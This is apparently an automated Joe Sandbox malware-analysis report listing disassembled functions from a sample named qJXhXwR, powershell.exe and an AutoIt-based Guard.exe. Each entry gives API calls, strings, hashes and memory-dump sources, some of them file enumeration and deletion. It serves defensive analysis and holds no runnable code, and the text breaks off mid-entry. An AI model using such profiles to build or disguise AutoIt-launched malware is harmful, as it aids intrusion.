SendMessageW.USER32 ref: 00007FF7A520DF26

Strings

ComboBox, xrefs: 00007FF7A520DEB5
ListBox, xrefs: 00007FF7A520DEEA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClassMessageNameSend
String ID: ComboBox$ListBox
API String ID: 3678867486-1403004172
Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
Instruction ID: 5380750fd1b60994a6fce495209090273a4d37d905a5f25bf8e2a12c53e7c385
Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
Instruction Fuzzy Hash: 6801C862A1F54292EA21F710E9901F99320FF87B84FC24131E58D07AEEDE2CD609CB10

Function 00007FF7A51E15B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF7A51E158E

Part of subcall function 00007FF7A51DFA90: _ctrlfp.LIBCMT ref: 00007FF7A51DFACB
Part of subcall function 00007FF7A51DFA90: _raise_exc.LIBCMT ref: 00007FF7A51DFB37

Strings

!, xrefs: 00007FF7A51E1576
tan, xrefs: 00007FF7A51E15BA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _ctrlfp_handle_error_raise_exc
String ID: !$tan
API String ID: 3384550415-2428968949
Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
Instruction ID: 3818efab40710452894431eaef0521d3c304d99d4a19cf3e5733d5aadf8f3d9e
Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
Instruction Fuzzy Hash: F3019672A29B8582DA15DF12E41033AA152FFDBBD4F504334E95E0BB98EF7CD1518B00

Function 00007FF7A51E14FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF7A51E158E

Part of subcall function 00007FF7A51DFA90: _ctrlfp.LIBCMT ref: 00007FF7A51DFACB
Part of subcall function 00007FF7A51DFA90: _raise_exc.LIBCMT ref: 00007FF7A51DFB37

Strings

!, xrefs: 00007FF7A51E1576
sin, xrefs: 00007FF7A51E1502

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _ctrlfp_handle_error_raise_exc
String ID: !$sin
API String ID: 3384550415-1565623160
Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
Instruction ID: 69bdcb1d230c9d9b94a5bd2c05dd62ebb76e1048077af40ca45174d0a590e4e3
Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
Instruction Fuzzy Hash: 4F01D872E19B8582D615DF22E40037AA252BFDBBD4F504334ED5E0AB98EF7DD1418B00

Function 00007FF7A51E14E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF7A51E158E

Part of subcall function 00007FF7A51DFA90: _ctrlfp.LIBCMT ref: 00007FF7A51DFACB
Part of subcall function 00007FF7A51DFA90: _raise_exc.LIBCMT ref: 00007FF7A51DFB37

Strings

!, xrefs: 00007FF7A51E1576
cos, xrefs: 00007FF7A51E14EE

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _ctrlfp_handle_error_raise_exc
String ID: !$cos
API String ID: 3384550415-1949035351
Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
Instruction ID: 737c593ecee6b3984587388dbfbd332366fa0e01a225735b0bd698e661b2f553
Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
Instruction Fuzzy Hash: 3501B572E29B8982D615DF22E40037AA152BF9BBD4F504334E95A0AB98EF7DD1519B00

Function 00007FF7A51E1370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FF7A51E13F6

Strings

exp, xrefs: 00007FF7A51E13E5
", xrefs: 00007FF7A51E13CF

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _handle_error
String ID: "$exp
API String ID: 1757819995-2878093337
Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
Instruction ID: 712a2f3d7e7efa27d7acc0a9783348ae397e6fea23fc34f8bcf410bd8cd18e1b
Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
Instruction Fuzzy Hash: 4E01E53AD29A88C3E221DF24E0456BAB6B0FFEA744F601315E74416A74CB7DD4819B00

Function 00007FF7A520C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF7A520C5B6

Strings

Error allocating memory., xrefs: 00007FF7A520C5AD
AutoIt, xrefs: 00007FF7A520C5A6

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
Instruction ID: 2bac732192494e8e5b921f90bbae35bd46bfeedd5ecee5490e5d3672bd1eabdf
Opcode Fuzzy Hash: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
Instruction Fuzzy Hash: 61F020A0B0A24642E7287361F5423B8A2519F8AB80FC10830CA4D07BFECDBDE4808310

Function 00007FF7A51C75C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF7A51C75E9
TlsSetValue.KERNEL32(?,?,?,00007FF7A51C7241,?,?,?,?,00007FF7A51C660C,?,?,?,?,00007FF7A51C4CD3), ref: 00007FF7A51C7600

Strings

FlsSetValue, xrefs: 00007FF7A51C75CD, 00007FF7A51C75D6

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
Instruction ID: ccd994094c27c15df948248e7a5b4ffeb7ea24c84a3503c20e226115d6127c29
Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
Instruction Fuzzy Hash: 06E065E1A0A54281FA066F55F8404B8A3B1AF49F91FCA5036D90D063FDCE7DE844C620

Function 00007FF7A51C5620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7A51C5629
_CxxThrowException.LIBVCRUNTIME ref: 00007FF7A51C563A

Part of subcall function 00007FF7A51C7018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A51C563F), ref: 00007FF7A51C708D
Part of subcall function 00007FF7A51C7018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A51C563F), ref: 00007FF7A51C70BF

Strings

Unknown exception, xrefs: 00007FF7A51C5645

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
Instruction ID: df2735cc30f3e03624e5576cfb00a5b79ea45a784f5ccc93cc6ef26e2e2fe2f6
Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
Instruction Fuzzy Hash: B4D05B6261554591DE10FB04E8403A8E330F762709FD14431D14D815F9DF2DD64AD310

Analysis Process: powershell.exePID: 7640, Parent PID: 7720COMMON

Executed Functions

Function 00007FF886D6091E Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2048984336.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74222fbc99e986f977cc70a62ec27718ef069d7096bc6166a7e616cf320fc6f3
Instruction ID: df445006867e098fbcf58f3477fbcc5715c1f2fb74d501ce8fe23d4f431ddce9
Opcode Fuzzy Hash: 74222fbc99e986f977cc70a62ec27718ef069d7096bc6166a7e616cf320fc6f3
Instruction Fuzzy Hash: 7AE1F262D1EBC64FE396967808652B57BE1EF562A4F0901FBE04EC71D3DD09AC06C392

Function 00007FF886D609EA Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2048984336.00007FF886D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886d60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d1ce763e208baa9ad6b4531f84c0c4ad31fb83cb9e4faae8ae78c1873eeae8
Instruction ID: ead4e432074c16274b611eaae210cd458cba236b93e4b85134e84abe9d24a4a2
Opcode Fuzzy Hash: 04d1ce763e208baa9ad6b4531f84c0c4ad31fb83cb9e4faae8ae78c1873eeae8
Instruction Fuzzy Hash: 62410512E1EA8B4FF3A9966C06616B966D2FF552E8F5801B9E40FC31D2DD0EBC05C381

Function 00007FF886C933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2044957794.00007FF886C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff886c90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: de6c694483eb91e2016f49dd70d9743eeac045a7d8a91c4f61b5ddf1d573d725
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: BD01677115CB0C8FD744EF1CE451AA5B7E0FB95364F10056DE58AC3651DB36E882CB46

Analysis Process: Guard.exePID: 7288, Parent PID: 7640COMMON

Execution Graph

Execution Coverage:	4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	26

Executed Functions

Function 00954005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00910284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00902A58,?,00008000), ref: 009102A4

Part of subcall function 00954FEC: GetFileAttributesW.KERNEL32(?,00953BFE), ref: 00954FED

FindFirstFileW.KERNEL32(?,?), ref: 0095407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 009540CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 009540DD
FindClose.KERNEL32(00000000), ref: 009540F4
FindClose.KERNEL32(00000000), ref: 009540FD

Strings

\*.*, xrefs: 0095404E

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 54666a1f932edb269802777f8caf0846849d8da785dd4d6d9bd5c4c5bc8e3afd
Instruction ID: cdb7d0644cc4cc017d9150733f190dc2681bee68396fd970a5bbaf367d2f93c2
Opcode Fuzzy Hash: 54666a1f932edb269802777f8caf0846849d8da785dd4d6d9bd5c4c5bc8e3afd
Instruction Fuzzy Hash: 18318D3101C345AFC341EB64C885AAFB7A8BED5315F404A1DF8E1821D2DB20EA4DC7A2

Function 008FB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00903740: CharUpperBuffW.USER32(?,009B71DC,00000000,?,00000000,009B71DC,?,008F53A5,?,?,?,?), ref: 0090375D

_memmove.LIBCMT ref: 008FB68A

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: ae3ac79add53f047f8dba998ab98087b29a43bccac940373e6d42d8cbf30da28
Instruction ID: 9bf6634fdaf067cd31588bbb0dec8de78abc19bc8f9df3570b139899c728bd4b
Opcode Fuzzy Hash: ae3ac79add53f047f8dba998ab98087b29a43bccac940373e6d42d8cbf30da28
Instruction Fuzzy Hash: C6A268746083499FD720DF28C480B2AB7E5FF88314F14895DEA9ACB361D771E985CB92

Function 0095494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0093FC86), ref: 0095495A
FindFirstFileW.KERNEL32(?,?), ref: 0095496B
FindClose.KERNEL32(00000000), ref: 0095497B

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: e0b1a3432b3696e63497117a9610290283901441d203ba6ad001b9b9e400740d
Instruction ID: f90a3cdcbe3b14ef20dcaf242cddec2fa68ad874ead1d446ccf7eb871eccc45f
Opcode Fuzzy Hash: e0b1a3432b3696e63497117a9610290283901441d203ba6ad001b9b9e400740d
Instruction Fuzzy Hash: 5DE0D832428505974350A738EC1E8EA775C9E4633AF100705F835C11D0E770A99C5796

Function 009029BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00910B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00902A3E,?,00008000), ref: 00910BA7

Part of subcall function 00910284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00902A58,?,00008000), ref: 009102A4

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00902ADF
SetCurrentDirectoryW.KERNEL32(?), ref: 00902C2C

Part of subcall function 00903EBE: _wcscpy.LIBCMT ref: 00903EF6

Part of subcall function 0091386D: _iswctype.LIBCMT ref: 00913875

Strings

Bad directive syntax error, xrefs: 0094008F
EA06, xrefs: 0093FD48
Unterminated string, xrefs: 009400D6
AU3!, xrefs: 00902A93
Error opening the file, xrefs: 0093FD33, 0093FDAA
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0093FD17

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-3738523708
Opcode ID: bf6fe9d35d2a09dbeddd125434a7110628b2bf68eeb1ffb8c25aeefcb2206f7a
Instruction ID: 40382b76110fc70f71200370533ca2f0b2ef2b221a022a10ff9c31d077af0e14
Opcode Fuzzy Hash: bf6fe9d35d2a09dbeddd125434a7110628b2bf68eeb1ffb8c25aeefcb2206f7a
Instruction Fuzzy Hash: 5602AF715083419FC724EF24C891AAFBBE9AFC9314F00492DF599972A2DB30DA49CB42

Function 00902FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009100CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00903094), ref: 009100ED

Part of subcall function 009108C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0090309F), ref: 009108E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009030E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009401BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009401FB
RegCloseKey.ADVAPI32(?), ref: 00940239
_wcscat.LIBCMT ref: 00940292

Strings

\, xrefs: 009402B5
Software\AutoIt v3\AutoIt, xrefs: 009030D8
Include, xrefs: 009401B1, 009401F2
\Include\, xrefs: 0090309F

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 6f9f81d51805bbecadf8931a5aa52225dcf56c70a61fca5db8004dec99df36cc
Instruction ID: 68819da7592cdd7907a9273bc1dd5a5b4e26729acb859d0508d11e27527feeab
Opcode Fuzzy Hash: 6f9f81d51805bbecadf8931a5aa52225dcf56c70a61fca5db8004dec99df36cc
Instruction Fuzzy Hash: F4718D715193059EC714EF24E945AABBBECFF88390F400A2EF565832A1EF709948DB52

Function 00904D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00904E22
KillTimer.USER32(?,00000001), ref: 00904E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00904E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00904E7A
CreatePopupMenu.USER32 ref: 00904E8E
PostQuitMessage.USER32(00000000), ref: 00904EAF

Strings

TaskbarCreated, xrefs: 00904E75

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628232537.00000000009B0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628286184.00000000009B9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_8f0000_Guard.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 4c32e78124cc8091de49e8c0ae10c2b7cad1b96cd70ce309b720359b985b514e
Instruction ID: 783a9bca1529f8ec217866263403f905e77cc345db66ea303c1db5a7179fa376
Opcode Fuzzy Hash: 4c32e78124cc8091de49e8c0ae10c2b7cad1b96cd70ce309b720359b985b514e
Instruction Fuzzy Hash: A141F6B121C20AAFDB255FA8DD4DB7E769DFBC0310F040B25F701962E1DA74AC50A761

Function 009050DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00905109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0090512A
ShowWindow.USER32(00000000), ref: 0090513E
ShowWindow.USER32(00000000), ref: 00905147

Strings

edit, xrefs: 00905124
AutoIt v3, xrefs: 00905101, 00905106, 00905107

Memory Dump Source

Source File: 00000017.00000002.2628006484.00000000008F1000.00000020.00000001.01000000.00000010.sdmp, Offset: 008F0000, based on PE: true

Associated: 00000017.00000002.2627965607.00000000008F0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.0000000000980000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2628149523.00000000009A6000.00000002.00000001.01000000.00000010.sdmpDownload File
